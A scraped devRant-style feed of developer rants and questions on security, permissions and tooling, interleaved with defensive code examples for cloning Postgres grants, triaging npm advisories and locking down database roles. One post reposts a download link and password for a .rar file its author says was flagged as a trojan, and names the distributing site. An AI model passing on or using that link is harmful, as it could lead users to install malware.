Hello-hello, monopolistic cashgrabage! I came to inform you that your TWA bullshit is unneeded in ETHICAL space. The only ones who would benefit from this thing are permission-hungry publishers. And I'm already sick of this culture where people are put into store bubbles. You can't hide the fact that this data and features you provide, with "native" layer, may be misused in a jiffy - and by big players, no less. Of course, as a vile dumpster that you are, you don't mind it.
Don't even bring up a battery consumption that comes with PWA and browser. This doesn't matter if you use an app for some 2 minutes to tick your mental checkboxes! I'm just sick of app stores and native apps that collect the data without normal warning, and dare to take more than 1 second to fucking load the cached data. Take a lesson or two from PWAs that collect (probably useful) cache, instead of my specs, and load almost instantly.12 -
Client be like:
Pls, could you give the new Postgres user the same perms as this one other user?
Me:
Uh... Sure.
Then I find out that, for whatever reason, all of their user accounts have disabled inheritance... So, wtf.
Postgres doesn't really allow you to *copy* perms of a role A to role B. You can only grant role A to role B, but for the perms of A to carry over, B has to have inheritance allowed... Which... It doesn't.
So... After a bit of manual GRANT bla ON DATABASE foo TO user, I ping back that it is done and breathe a sigh of relief.
Oooooonly... They ping back like -- Could you also copy the perms of A on all the existing objects in the schema to B???
Ugh. More work. Lets see... List all permissions in a schema and... Holy shit! That's thousands of tables and sequences, how tf am I ever gonna copy over all that???
Maybe I could... Disable the pager of psql, and pipe the list into a file, parse it by the magic of regex... And somehow generate a fuckload of GRANT statements? Uuuugh, but that'd kill so much time. Not to mention I'd need to find out what the individual permission letters in the output mean... And... Ugh, ye, no, too much work. Lets see if SO knows a solution!
And, surprise surprise, it did! The easiest, simplest to understand way, was to make a schema-only dump of the database, grep it for user A, substitute their name with B, and then input it back.
What I didn't expect is for the resulting filtered and altered grant list to be over 6800 LINES LONG. WHAT THE FUCK.
...And, shortly after I apply the insane number of grants... I get another ping. Turns out the customer's already figured out a way to grant all the necessary perms themselves, and I... No longer have to do anything :|
Joy. Utter, indescribable joy.
Is there any actual security reason for disabling inheritance in Postgres? (14.x) I'd think that if an account got compromised, it doesn't matter if it has the perms inherited or not, cuz you can just SET ROLE yourself to the granted role with the actual perms and go ham...3 -
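The dump-grep-substitute approach from the post above, as an added example that is not the poster's script and not part of PostgreSQL: it reads schema-only dump text, keeps only the `GRANT` lines (including the `GRANT` inside `ALTER DEFAULT PRIVILEGES`), and rewrites the grantee only when the *whole* identifier matches the source role, so a plain `sed s/alice/bob/` trap such as a role `alice2`, a quoted role `"Alice"`, or a table named `alice_archive` is left alone. The dump excerpt, roles and objects are constructed for the example.

```python
import re

# Constructed excerpt in the shape of `pg_dump --schema-only` output
# (hypothetical roles and objects).
SCHEMA_DUMP = """\
--
-- Name: orders; Type: TABLE; Schema: public; Owner: app_owner
--
CREATE TABLE public.orders (id integer NOT NULL);
GRANT SELECT,INSERT ON TABLE public.orders TO alice;
GRANT SELECT ON TABLE public.orders TO reporting,alice2;
GRANT USAGE ON SEQUENCE public.orders_id_seq TO "Alice",alice WITH GRANT OPTION;
GRANT SELECT ON TABLE public."alice_archive" TO bob;
ALTER DEFAULT PRIVILEGES FOR ROLE app_owner IN SCHEMA public GRANT SELECT ON TABLES TO alice;
REVOKE ALL ON SCHEMA public FROM PUBLIC;
"""

# One GRANT per line, as pg_dump writes them. "head" keeps everything up to and
# including "TO ", "grantees" is the comma-separated role list.
GRANT_RE = re.compile(
    r"^(?P<head>(?:ALTER DEFAULT PRIVILEGES .*?)?GRANT\b.*?\bTO\s+)"
    r"(?P<grantees>.+?)(?P<tail>\s+WITH GRANT OPTION)?;$"
)


def split_grantees(text):
    """Split a role list on commas that are not inside double quotes."""
    names, current, quoted = [], "", False
    for ch in text:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            names.append(current.strip())
            current = ""
        else:
            current += ch
    names.append(current.strip())
    return names


def canonical_role(identifier):
    """Postgres folds unquoted identifiers to lower case; quoted ones are literal."""
    if identifier.startswith('"') and identifier.endswith('"'):
        return identifier[1:-1].replace('""', '"')
    return identifier.lower()


def quote_role(name):
    return '"' + name.replace('"', '""') + '"'


def clone_grants(dump_sql, source_role, target_role):
    """Return GRANT statements that give target_role the object-level
    privileges the dump shows for source_role (whole-identifier match only)."""
    statements = []
    for line in dump_sql.splitlines():
        match = GRANT_RE.match(line.strip())
        if not match:
            continue
        grantees = [canonical_role(g) for g in split_grantees(match.group("grantees"))]
        if source_role not in grantees:
            continue
        statements.append(match.group("head") + quote_role(target_role)
                          + (match.group("tail") or "") + ";")
    return statements


if __name__ == "__main__":
    for stmt in clone_grants(SCHEMA_DUMP, "alice", "bob"):
        print(stmt)
```

The output is plain SQL that can be piped into `psql`. On the closing question: with `NOINHERIT`, a session does not silently carry every privilege of every role it is a member of; it has to `SET ROLE` first, which makes privilege use an explicit (and loggable) step and keeps a session's default reach minimal. It is a least-privilege measure against accidental or over-broad use by the account's own code, not a defence against an attacker who already holds the credentials, since, as the post says, they can `SET ROLE` too.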
Another day, another critical vulnerability due to an out of bounds write that could never have occurred in Rust
https://github.com/openssl/openssl/...31 -
Sometimes I really hate offshore desktop support... yes I know Visual Studio 15 was installed, and works. But now Python tools was uninstalled in a forced update that corrupted my VS and now I can't install PTVS (not that I need it, VS has the vim emulator that I can install at work, it's a whole mess of weird security policies.) Fucking hate Windows and Visual Studio. Fucking listen to what I'm telling you the issue is. I need your dumbass to uninstall this shit software so I can do a clean install since the shitty software management system doesn't do shit when it says "uninstalling".
On a side note, this fuckwit just tried to explain what the screenshot tool and how to use it... it's only pinned to my taskbar and menu for shits and gigs since I don't use it everyday to tell the stupid data entry analysts I deal with to fuck off. -
Origin, the game thingy that launches other games..
Not a huge fan, but I've built up a small game collection from special offers/freebies/etc.
But every now and then, this happens:
For years..
Why can't they fix their shit !
Meanwhile, trying to log in with Ubisoft connect..
Their, 2 stage security wants to send me an email, great !
Only, before I can read the email, it says:
"Session has expired due to inactivity, please log in again."
I wasn't inactive, I was checking my bloody email you bastard !7 -
Please share your thoughts on Dependabot security alerts on Github, more specifically for NPM packages in package-lock.json.
In 99% of cases I've found them useless as:
- package-lock.json is in the repo, but not in the NPM package (=no value to users)
- most of the updates relate to devDependencies (=no value to users)
- it clutters the git history (and changelog if it is auto-generated) with a batch of patch updates (updated depx to .1, .2, .3) while the only important thing in the next release notes is the delta (updated depx from .1 to .3) (=no value to users)10 -
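The triage the post above argues for (does this alert matter to the package's users at all?), as an added example that is not the poster's code and not part of Dependabot: read a lockfile in the `lockfileVersion` 2/3 layout, where every installed package is keyed by its `node_modules` path and carries `"dev": true` when it is only reachable through devDependencies, and classify each advisory as dev-only, runtime, or not affected. The lockfile and the advisory list are constructed; the version check keeps only the "first patched version" a real alert would carry.

```python
import json

# Constructed package-lock.json (lockfileVersion 2/3 layout). Nested copies of a
# package appear under the path of the package that pulled them in.
LOCKFILE = json.loads("""
{
  "name": "example-lib",
  "lockfileVersion": 2,
  "packages": {
    "": {
      "dependencies": {"node-fetch": "^2.6.1", "lodash": "^4.17.21"},
      "devDependencies": {"mocha": "^9.0.0"}
    },
    "node_modules/node-fetch": {"version": "2.6.1"},
    "node_modules/lodash": {"version": "4.17.21"},
    "node_modules/mocha": {"version": "9.1.3", "dev": true},
    "node_modules/minimist": {"version": "1.2.5", "dev": true},
    "node_modules/mocha/node_modules/minimist": {"version": "1.2.5", "dev": true}
  }
}
""")

# Constructed advisories: package name and first patched version (hypothetical).
ADVISORIES = [
    {"name": "minimist", "patched": "1.2.6"},
    {"name": "node-fetch", "patched": "2.6.7"},
    {"name": "lodash", "patched": "4.17.21"},
]


def parse_version(version):
    """Numeric core of a semver string as a comparable tuple (prerelease tag dropped)."""
    return tuple(int(part) for part in version.split("-")[0].split("."))


def installed_copies(lockfile, name):
    """All installed copies of a package, including nested (non-deduplicated) ones."""
    suffix = "node_modules/" + name
    return [(path, meta) for path, meta in lockfile["packages"].items()
            if path == suffix or path.endswith("/" + suffix)]


def triage(lockfile, advisories):
    """Map each advisory to 'dev-only', 'runtime', or 'not-affected'.

    'runtime' wins as soon as any vulnerable copy is reachable from the
    published dependency tree; 'dev-only' requires every vulnerable copy
    to be marked dev."""
    verdicts = {}
    for adv in advisories:
        patched = parse_version(adv["patched"])
        vulnerable = [(path, meta) for path, meta in installed_copies(lockfile, adv["name"])
                      if parse_version(meta["version"]) < patched]
        if not vulnerable:
            verdicts[adv["name"]] = "not-affected"
        elif all(meta.get("dev", False) for _, meta in vulnerable):
            verdicts[adv["name"]] = "dev-only"
        else:
            verdicts[adv["name"]] = "runtime"
    return verdicts


if __name__ == "__main__":
    for name, verdict in triage(LOCKFILE, ADVISORIES).items():
        print(name + ": " + verdict)
```

A "dev-only" verdict supports the post's point: nothing in the published package changes, so there is nothing to tell users. It does not mean zero risk for the project itself, because the build pipeline still executes those dev dependencies; that is a separate, maintainer-side decision.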
After brute forced access to her hardware I spotted huge memory leak spreading on my key logger I just installed. She couldn’t resist right after my data reached her database so I inserted it once more to duplicate her primary key, she instantly locked my transaction and screamed so loud that all neighborhood was broadcasted with a message that exception is being raised. Right after she grabbed back of my stick just to push my exploit harder to it’s limits and make sure all stack trace is being logged into her security kernel log.
Fortunately my spyware was obfuscated and my metadata was hidden so despite her wanting to copy my code into her newly established kernel and clone it into a new deadly weapon, all my data went into a temporary file I could flush right after my stick was unloaded.
Right after deeply scanning her localhost I removed my stick from her desktop and left the building, she was left alone again, loudly complaining about her security hole being exploited.
My work was done and I was preparing to break into another corporate security system.
- penetration tester diaries2 -
On the topic of having to make decisions as a dev that shouldn’t be made (solely, at least) by devs…
There’s a lot to like in my current work environment: I enjoy being around my colleagues, I get to do a variety of tasks, and many of them interesting to me and/or great learning opportunities, the pay doesn’t suck and so on… there’s also not much pressure put on the dev team from other parts of the organisation. The flipside of the coin is that nobody who should express some kind of vision as to how we should develop the product further does so.
Me and my fellow devs in the team are so frustrated about it. It feels like we’re just floating around, doing absolutely nothing meaningful. It’s as if the business people just don’t care. And we are the ones ending up deciding what features to develop and what the specs are for those etc. and I really don’t think we should be the ones doing that.
One would think that’s a great opportunity to work on refactoring, infrastructure, security and process improvements and so on - but somehow we get bothered just enough by mundane issues we can’t get to work on those effectively. Also, many of the things we’d want to do would need sign-off from the management, but they are not responsive really. Just not there. Except for our TM, but they don’t have the power neccessary… at least they are trying tho… -
How do you like to develop through a VM through a VPN to another continent? Because it seems one of our clients is about to enforce such a model.... due to security reasons...9
-
Currently have a very funny project lead, who gives on-the-spot estimates for a 9-year-old Android app in the security domain with very pathetic code quality. Memory leaks, bad practices, typos, CVEs etc., you name it, we have it in the source of our app.
Since 5-6 sprints of our project, almost 50% of user stories were incomplete due to underestimation.
Basically everyone in management was almost asleep about code quality for the last 7-8 years & now suddenly when the new Dev & QA team is here they want us to fix everything ASAP.
The most humorous thing is the product owner is aware of the importance of unit test cases, but doesn't want to allocate user stories for that at the time of sprint planning, as the code is almost frozen according to him for the current release.
Actually, since the last release he has done the same thing for each sprint; around 18 months have passed and still he hasn't spared a single day for unit testing.
Recently an app crash issue was found in a version upgrade scenario, as the QAs were tired out by testing hundreds of basic trivial test cases manually & server-side testing too, so they can't do the actual needed testing, which is tougher to automate for Dev.
Recently when the team's old MacBook Pros expired, higher management allocated Intel Mac minis, saying that a few people in the organization were misusing MacBooks. So for just a few people everyone has to suffer now, as there is no flexibility in frequently changing between WFH & WFO. 1 of those Mac minis overheated & has been in repair for 6 months.
Out of 4 Devs & 3 QAs, all 3 QAs & 2 Devs have left gradually.
I think it's time to say goodbye 😔4 -
I always hated it in school computing lessons when the teacher's pet students would snitch on you for getting around the school network stuff.
Many people in the lesson would always play games instead of doing what they were meant to. So the teacher turned off the internet in the room using the admin control stuff. Then when I found a way around it all so I could watch some educational YouTube videos, the stupid teacher's pet would snitch on me. Luckily the teacher knew I wasn't using it to mess around; always felt good when he said that I could access it because I'm the biggest security threat to the school.
Did you ever have issues with snitches in computing lessons?6 -
Thoughts after a security conference.
The private sector, no matter the size, often plays a role (e.g. entry vector, DDoS load generating botnet, etc.) in massive, sometimes country-wide attacks. Shouldn't that make private businesses' CyberSec a matter of national security? Shouldn't the government create and enforce a security framework for private businesses to implement in their IT systems? IMO that'd also enforce standardised data security and force all the companies treat ITSec with at least minimal care (where "minimal" is set by the gov)
What are your thoughts?10 -
Was working on a high priority security feature. We had an unreasonable timeline to get all of the work done. If we didn't get the changes onto production before our deadline we faced the possibility of our entire suite being taken offline. Other parts of the company had already been shut down until the remediations could be made - so we knew the company execs weren't bluffing.
I was the sole developer on the project. I designed it, implemented it, and organized the efforts to get it through the rest of the dev cycle. After about 3 month of work it was all up and bug free (after a few bugs had been found and squashed). I was exhausted, and ended up taking about a week and a half off to recharge.
The project consisted of restructuring our customized frontend control binding (asp.net -custom content controls), integrations with several services to replace portions of our data consumption and storage logic, and an enormous lift and shift that touched over 6k files.
When you touch this much code in such a short period of time it’s difficult to code review, to not introduce bugs, and _to not stop thinking about what potential problems your changes may be causing in the background_.3 -
https://github.com/PwnFunction/...
Who led this flattening user input object into the Next.js codebase, also thinking that `runContext` is going to make better companion than `eval`?
Yet another reason to switch over to Sapper and other Svelte minimalistic solutions, in my opinion.1 -
I love my Mac but damn, most MacOS releases are so damn useless, I won't do a major OS overhaul (updating from Big Sur to Montrey) just to get Share Play and the opportunity to watch movies together with my few Mac using friends, I don't need those fucking marketing driven bells and whistles, just give me a stable UNIX base an efficient and good looking UI and regular security patches and I'm good.
I would be happy to keep using Mavericks, but without yearly MacOS releases how would Apple be able to convince normies to replace their 10 year old MacBooks?4 -
The IT manager said that the site on my private VPS where we are using a small tool as reference is a security issue, and what if it may be hacked... Well, from this point of view all the websites shall be switched off. The tool lowered the problem resolution from 30 to 2 minutes.. I have asked for an on-premise server before but no one gave a shit so I hosted it on my private VPS. I won't give it back for free, it's a sure thing. Soon they will start to get the complaints that it's offline because the customer is using it for debugging too. I feel like IT and dev are really moving apart. They act as a bunch of pathetic jealous guys who couldn't learn programming and ended up installing Windows on machines...7
-
Welp, Guess I'm back after almost 3 years. I graduated and can now officially call myself a network & security engineer.1
-
That's top-notch design.
All actions happening on the page go to one endpoint. Removing old trusted computers, changing the password, changing 2FA, you name it.
Now if you want to remove all old trusted devices, you cannot remove all at once, there is no button for it. So you click one after the other. And then it stops working. Ok, then do the normal password rotation. Hmm, button has a loading spinner and then nothing happens.
Looking into the browser console:
- All requests go to /myaccount/security/graphql
- All requests get a 429 Too many requests
- Even if you just click a panel, it tracks the action to the graphql endpoint. Or at least tries to because even that gets shot down with a 429
Pretty dumb, eh? Must be some small shitty website. It's not. It's fucking paypal.1 -
1. As I was freelancing on Upwork some company contacted me and said my CV looks interesting and they gave me a link from their site to download a .rar file with details about their company and dev positions
2. Ok I open the link and the whole site is just a blank page with 1 single button: "Download 5.8 mb"
3. Thought to myself: who the fuck has this low quality site for a company, shitty as fuck and as if it's built in the 90s. But ok
4. About 2 days later they got banned on Upwork and we can't chat anymore. I sent this .rar file to VirusTotal and 7 antivirus engines detected a trojan + 14 security vendors flagged the rar as malicious malware
Are you FUCKING kidding me? This is the type of bullshit I'm expecting to see in web3 world. Who the FUCK comes on upwork to infect ENGINEERS?? Are you FUCKING KIDDING ME? I'll publish their data right now:
Link:
https://hsatrack.com/files/...
Password: 49-49Zb2
Their site:
https://hsatrack.com/
Honestly if i opened this fucking home page site first i would have smelled a virus miles away. But i just didnt expect a fucking virus AT ALL on UPWORK. Never happened to me before. This is the type of criminal fraud malware shit i expect AND SEE DAILY on WEB3 -- WHO TF DOES IT IN WEB2 IN 2023?? I'LL FUCK THIS CEO'S LIFE UPSIDE DOWN 180 RIGHT NOW1 -
We should find a way to replace passwords: any password manager I've tried is inaccurate at identifying login forms and is too hard to use for non-technical people older than 40, and convincing people not to use some stupid name + birth year combination as their password is a frustrating uphill battle.13
-
I have 2FA enabled on NPM so it would shut up about it, the recovery codes are in my password manager, right next to my secure randomly generated password.
Password authentication is fucking stupid.3 -
*Frustrated user noises* Whyyyy, Grafana, why don't you implement any actual query forgery checks?!
So long as a user has access to the Grafana frontend, they can happily forge the requests going off to the backend, and modify them to return *whatever* data they want from the datasource.
No matter that they're a read-only user. That only stops them from modifying the dashboard definitions on the frontend, but doesn't enforce any sort of immutability on the BE...
If anyone had any tips on how to further secure it, I'm curious...5 -
Your face when a customer's manager shares the credentials to at least five different production environment databases and third party services, in their project management platform (making them accessible to the entire organization) because they want to be a developer when they grow up.
-
Mark Russinovich, the chief technology officer of Microsoft Azure, says developers should avoid using C or C++ programming languages in new projects and instead use Rust because of security and reliability concerns.30
-
Client's IT department is fine about giving me a laptop for exclusive access to their VPN, security reasons, etc. Ok, fine I get it.
But they do not want to give me a Linux machine - only Windows!
How am I supposed to get shit done.11 -
So I have been thinking..
SQL is a language that runs on specific software on the server, and helps create data stores (databases and tables) that can be queried & manipulated.
Is there a way to run SQL-like queries on the client side with no interaction from the backend at all?
Say I have 5 inter-related data models. In a backend world, they will form nice little tables of a DB with all their joins and composite keys. From the server, I shall be querying them like "SELECT name from x where y=z & ..."
But what if I could store them like tables in browser memory and run the same query filters via a query language... is this possible?
I know this poses a certain security risk, but we already use cookies, local storage and a lot of JSON-based shitty client-side storages. Surely it might be possible to have less optimised SQL tables on the frontend with extremely good querying capabilities?
Or am I talking about something far-fetched here?8
Context: I am a 20 y/o student studying at a Mumbai University college.
SO RECENTLY I GRABBED AN INTERNSHIP AT A BIG SOFTWARE COMPANY AS AN SDE INTERN
So before all this I was that guy in college who was never invited to parties or night outs, as I am not from a rich background. They used to tease me about my style of clothing and how I used to talk; my English is fluent, but I still used to get bullied. I just had this female friend of mine who always used to support me, be it a LeetCode question or staying up late with me for studies, but she was also teased because of me, as I was not from a well-known family and didn't have money to show flashy things... She was so happy when I got this internship.
PS: It was the first day of my internship. I went to the campus; it was so pretty, as I haven't seen anything as pretty as this office campus, so I took a picture standing next to the company logo. The watchman took it for me, as I was too early to the campus and there was no one there. I was smiling like a dumb person; that security guy was happy after knowing my story. Then I posted it on my IG and Snapchat, then I went in to wait for the onboarding stuff, and then I got to meet my HR, and she discussed everything. She was sweet enough to explain everything to me in detail; the staff was friendly too. Then I checked my phone when the day at the office was complete.
Guess what: all those people who used to mock me and my friend for being nerds, and used to mock me because of my financial background, were now congratulating me and asking me how I got this and all.
So I just want you to know: please don't judge anyone or bully anyone just because of their background; they are always suffering in the dark. I would like to thank my close friend who was always with me.
Ty guys for reading till the end.
-
One of our senior colleagues in my last project at TCS had brought a pen drive with him, not sure why! He worked on a client system, which he believed was not monitored by TCS. So what he did was, he plugged the pen drive into his computer and tried to copy some files from his pen drive to the computer. However, he wasn't able to copy the files.
We weren't aware of this until our project manager, who sits at the farthest end of the ODC, shouted at the top of his voice, calling out his name. In front of the entire ODC, he was scolded, since the HR team had called the manager informing him that the machine assigned under this employee's name had detected a security breach.
He had to explain the reason, where he said he wanted to copy some code that he had to the office machine in order to reduce his manual effort, which was probably very silly of him! For the next few days I hardly saw him inside the ODC; he probably had to visit people to show cause or other things, and was harassed by our manager and insulted every time he passed by him.
He was not suspended, though; maybe the manager or someone else saved him, although normally such violations would have seen him terminated.
-
The platform team who provides all other teams with a common framework emails everybody that we need to upgrade the framework to a new version. Let's say version 1.a.0. They say it brings crucial security features and all pipelines using old versions would be blocked. My colleague created a story to upgrade all of our 10 microservices. When I got to it in a couple of days, for some fucking reason they had already rolled out 1.a.1 and didn't inform anybody; the pipelines just logged a warning that you need to use 1.a.1. Alright, I did the upgrade to 1.a.1 and merged fucking everything in 10 fucking microservices. A couple of days later, in the morning, they roll out 1.a.2 and require everybody to upgrade, fucking degenerates, as they found a high-severity bug. I wanted to start again but was lazy and did nothing all day, to learn that at 6pm the fuckers rolled out 1.a.3!!! And again required everyone to upgrade!1!1!1eleven
Ten fucking microservices. Goddammit, write some unit tests, do friends&family, do fucking tests on a small group of your inner clients before rolling out this shit that everybody must use.
Spat at the display -
I wonder if crypto exchanges are so damn vulnerable or just so transparent.
I mean, it is impossible to scroll tech articles for more than a few seconds before stumbling on a report of yet another crypto exchange being nicked a couple hundred mil USD.
- It could be that their security severely sucks (wouldn't blame them for it, most businesses do suck at securing shit).
- It could be that the entire black hat community is putting its might into stealing money that is so fucking easy to launder.
- It could be that it is damn nigh impossible to cover up a crypto hack, since the evidence of coins drifting away is forever on display in the public ledger, and in that case crypto companies are not hacked more often than regular companies; they are just much more often publicly shamed for it.
- It could be a mix of all the above, but my intuition is that one factor is more relevant.
Which would be the most relevant factor? One of the above or yet another attack vector to the stupidest value conduit ever?
-
I decided to use Docker Compose on a tiny project that essentially consists of an API and a Caddy server that serves static files and proxies to the API, all of this running on an EC2 t1-nano. I made this admittedly odd choice because I wanted to learn Compose and simultaneously forego figuring out why the node-gyp bindings for sqlite3 refuse to build on EC2 even though it builds just fine on my machine.
I am storing secrets in .env which is committed into the private GH repo. Just now I came across a rant that described the same security practice and it sounded pretty bad from an outside perspective so I decided to research alternatives.
Apparently professional methods for storing secrets generally have higher system requirements than a t1-nano. I'm not looking for a complex service orchestration system; I'm not trying to run an enterprise on this poor little cloud-based Raspberry Pi. I just want to move my secrets out of the Git repo.
Any tips?
-
Lately, as I've been reading about hacks in companies like Uber, Rockstar etc., I've come to remember my time at a company that worked like a feature factory, where developers constantly groaned about not having enough time to do things right. This had led to having a few dozen people (both business and technology side) with direct access to the production database, just so they could do their jobs, and that database was replicated across various environments just so they could develop on top of it and do "proper testing".
The bad side is, this database contained the personal information of millions of people (names, addresses, SSNs...). I saw this security problem and always spoke out about it, but there was never enough time to do anything about it, like build the features the users need for them to do their job without direct access to the database. The app itself was a monolithic nightmare with poor development standards and holes here and there.
It only takes one person whose credentials could be compromised to bring that entire business down, because all the data resides in one single database. However, they are lucky that there were at least smart people in the Ops department, so they do have some good security measures in place on that side, because the development side was complete shit. Don't go slacking around with security!
-
Not sure how to ask this. I really enjoy the network side of IT. Maybe even throw in a little cyber security as well. I feel like I'm trying to do everything too fast. I've got no certifications yet. This is stressful 😫
-
What did I do while down for the count with Covid?
* Set up a static React site
* Hosted the site at Cloudflare Pages
* Protected the page through CF Access
* Extracted the JWT
* Set up a Rails API to validate the token
Now I have static React UIs with a nice rich API backend.
-
Security experts have discovered hundreds of fake websites which are being used to spread dangerous malware for Android and Windows devices. A "vast" network of over 200 internet pages, which impersonate 27 brands such as household names like TikTok, PayPal and Snapchat, are being used to spread a vicious bug which can empty out bank accounts. These bogus websites feature the notorious ERMAC banking trojan which is capable of stealing sensitive login details for 467 online banking and cryptocurrency apps.
-
A question to all software security specialists of devRant. Please, take it seriously.
Is it fundamentally possible to restrict a SQL database like Postgres in a way that unintended SQL queries are impossible to execute? Perhaps in some kind of whitelist fashion. Is it possible to achieve the kind of security that will be just fine exposed to the outside world, akin to the "SQL queries in onClick handlers" scenario?
Or is this an uphill battle of never being able to moderate an infinite set of possible fraudulent queries?
-
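A worked example, added here and not taken from either post, for the Postgres question above and for the Grafana rant earlier in the feed (read-only users forging the requests that reach the datasource): you cannot whitelist arbitrary SQL text, but you can make the role the client connects as unable to reach anything except a fixed set of queries, so whatever SQL arrives either hits the whitelist or fails with "permission denied". It assumes PostgreSQL; the schema and table (`app.orders`), the roles (`api_client`, `grafana_ro`), the function name and the sample rows are all assumptions made for the illustration.

```sql
-- Added example (not from the posts). Assumed schema and sample data.
CREATE SCHEMA IF NOT EXISTS app;
CREATE TABLE IF NOT EXISTS app.orders (
  id          integer PRIMARY KEY,
  customer_id integer NOT NULL,
  total       numeric NOT NULL,
  region      text    NOT NULL,
  placed_at   timestamptz NOT NULL DEFAULT now(),
  card_last4  text                 -- something the exposed roles must never read
);
INSERT INTO app.orders VALUES (1, 42, 19.99, 'eu', now(), '4242'),
                              (2, 42, 5.00,  'us', now(), '1111');

-- 1. The role the outside world connects as owns nothing and can read nothing.
CREATE ROLE api_client LOGIN PASSWORD 'change-me' NOINHERIT;
REVOKE ALL ON SCHEMA public FROM PUBLIC;            -- pre-15 default lets PUBLIC create here
REVOKE ALL ON ALL TABLES IN SCHEMA app FROM api_client;
-- New functions are EXECUTE-able by PUBLIC by default; that is the usual hole.
ALTER DEFAULT PRIVILEGES IN SCHEMA app REVOKE EXECUTE ON FUNCTIONS FROM PUBLIC;
GRANT USAGE ON SCHEMA app TO api_client;            -- may name objects, not read them

-- 2. The whitelist: each permitted query is a SECURITY DEFINER function.
--    The body runs with the function owner's rights; the caller never touches the table.
CREATE OR REPLACE FUNCTION app.orders_for_customer(p_customer_id integer)
RETURNS TABLE (order_id integer, total numeric, placed_at timestamptz)
LANGUAGE sql
STABLE
SECURITY DEFINER
SET search_path = pg_catalog, app   -- pinned: caller cannot plant a look-alike object
AS $$
  SELECT o.id, o.total, o.placed_at
    FROM app.orders AS o
   WHERE o.customer_id = p_customer_id
   ORDER BY o.placed_at DESC
   LIMIT 100;
$$;
REVOKE ALL ON FUNCTION app.orders_for_customer(integer) FROM PUBLIC;
GRANT EXECUTE ON FUNCTION app.orders_for_customer(integer) TO api_client;

-- 3. Blast-radius limits. These are soft (a session can SET them back); the
--    privileges above are what actually hold.
ALTER ROLE api_client SET statement_timeout = '5s';
ALTER ROLE api_client CONNECTION LIMIT 20;
ALTER ROLE api_client SET default_transaction_read_only = on;

-- 4. Where a role must read a table directly (a Grafana datasource, say):
--    column-level grants plus row-level security. The filter lives in the
--    server, so a forged dashboard query still only sees these rows/columns.
CREATE ROLE grafana_ro LOGIN PASSWORD 'change-me-too';
GRANT USAGE ON SCHEMA app TO grafana_ro;
GRANT SELECT (id, total, placed_at, region) ON app.orders TO grafana_ro;
ALTER TABLE app.orders ENABLE ROW LEVEL SECURITY;
-- Hard-code the scope or read it from a table the role cannot write. Do NOT
-- derive it from a session setting: the role could just SET it to another value.
CREATE POLICY grafana_region ON app.orders
  FOR SELECT TO grafana_ro
  USING (region = 'eu');
-- Note: the table owner bypasses RLS unless FORCE ROW LEVEL SECURITY is set, and
-- other roles with no matching policy get no rows at all. Keep the function
-- owner and table owner the same, and do not FORCE, or the function above returns nothing.

-- Check, connected as api_client (or SET ROLE from a superuser):
SET ROLE api_client;
SELECT * FROM app.orders;                     -- ERROR: permission denied for table orders
SELECT * FROM app.orders_for_customer(42);    -- allowed: 2 rows, no card_last4
RESET ROLE;
SET ROLE grafana_ro;
SELECT id, region FROM app.orders;            -- only the 'eu' row
SELECT card_last4 FROM app.orders;            -- ERROR: permission denied for table orders
RESET ROLE;
```

This does not make "SQL in onClick handlers" safe; it changes the question. The client can still send any text it likes, but the set of things that text can do is exactly the functions the role may execute, plus whatever RLS and column grants expose. That is the whitelist, and it is finite and reviewable. For the Grafana case the same idea applies to the datasource credentials: give the datasource its own role scoped like `grafana_ro`, and a forged request can only return what that role can see, regardless of what the dashboard definition says.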
So, I've been with my current employer for four years now, three and a half of which have been spent working as a time-and-materials developer for a huge fashion company. I've been trying to get out of it for the past six months, only for my exit to be postponed every time. There's also no clear idea as to what I would be moved to going forward. Nobody is telling me a thing, and I think other developers will be moved to different projects before I do.
That's why I took matters into my own hands and started getting back into the recruitment process. I'm about to receive an offer. A fairly better one.
The thing is, I wanna use such an offer to see if my current employer can redeem himself and propose to me a good counter offer. I'm not in the mood for starting over, but I want security, and management to have a fucking idea of what my future is gonna be like at this fucking company.
What do you guys think? Am I playing with fire?
-
Due to my company's Microsoft AD team being amateurs, I have to MFA on my work-issued computer at least 4-6 times a day, for each individual work system I access.
Today I had to reset my password. It's double prompts for me today 😂
-
You can make your software as good as you want, if its core functionality has one major flaw that cripples its usefulness, users will switch to an alternative.
For example, an imaginary file manager that is otherwise the best in the world becomes far less useful if it imposes an arbitrary fifty-character limit for naming files and folders.
If you developed a file manager better than ES File Explorer was in the golden age of smartphones (before Google exercised their so-called "iron grip" on Android OS by crippling storage access, presumably for some unknown economic incentive such as selling cloud storage, and before ES File Explorer became adware), and if your file manager had all the useful functionality like range selection and tabbed browsing and navigation history, but it limits file names to 50 characters even though the file system supports far longer names, the user will have to rely on a different application for the sole purpose of giving files longer names, since renaming, as a file action, is one of the few core features of a file management software.
Why do I mention a 50-character limit? The pre-installed "My Files" app by Samsung actually did once have a fifty-character limit for renaming files and folders. When entering a longer name, it would show the message "up to 50 characters available". My thought: "Yeah, thank you for being so damn useful (sarcasm). I already use you reluctantly because Google locked out superior third-party file managers likely for some stupid economic incentives, and now you make managing files even more of a headache than it already is, by imposing this pointless limitation on file names' length."
Someone at Samsung's developer department had a brain fart some day that it would be a smart idea to impose an arbitrary limit on file name lengths. It isn't.
The user needs to move files to a directory accessible to a superior third-party file manager just to give it a name longer than fifty characters. Even file management on desktop computers two decades ago was better than this crap!
All of this because Google apparently wants us to pay them instead of SanDisk or some other memory card vendor. This again shows that one only truly owns a device if one has root access. Then these crippling restrictions that were made "for security reasons" (which, in case it isn't clear, is an obvious pretext) can be defeated for selected apps.
-
I had a little question about recruitment:
What would make you consider a position with a relocation package? What kind of arrangement/security would you like?
-
I’m side-eyeing my apartment building’s management for emailing me a non-password-protected document that includes my Social Security number. 🤨4
-
A philosophical question about maintenance/updating.
There is no need to repeat the reasons we need to update our dependencies and our code. We know them, especially regarding the security issues.
The real question is, "does that indicate a failure of automation"?
When I started thinking about code, and when I was also a kid and saw all these sci-fi universes with robots etc., the obvious thing was that you build an automation to do the job without having to work on it anymore. There is no meaning in automating something that needs constant work on it.
When you have a car, you usually do not upgrade it all the time; you do some maintenance (oil, tires), but it keeps your work on it to a logical amount.
A better example is the abacus, a calculating device which you know works as it works.
A promise of functional programming is that because you are based on algebraic principles, you do not have to worry so much about your code; you know it will do the logical thing it is supposed to do.
The Unix philosophy made software that has been "updated" so little compared to all these modern apps.
Coding, because of its changeable nature, is the first victim of human nature's dissatisfaction.
The modern software industry has so many techniques and principles (SOLID, liquid, patterns, testing that the air is air) and still needs so many developers to work on a project.
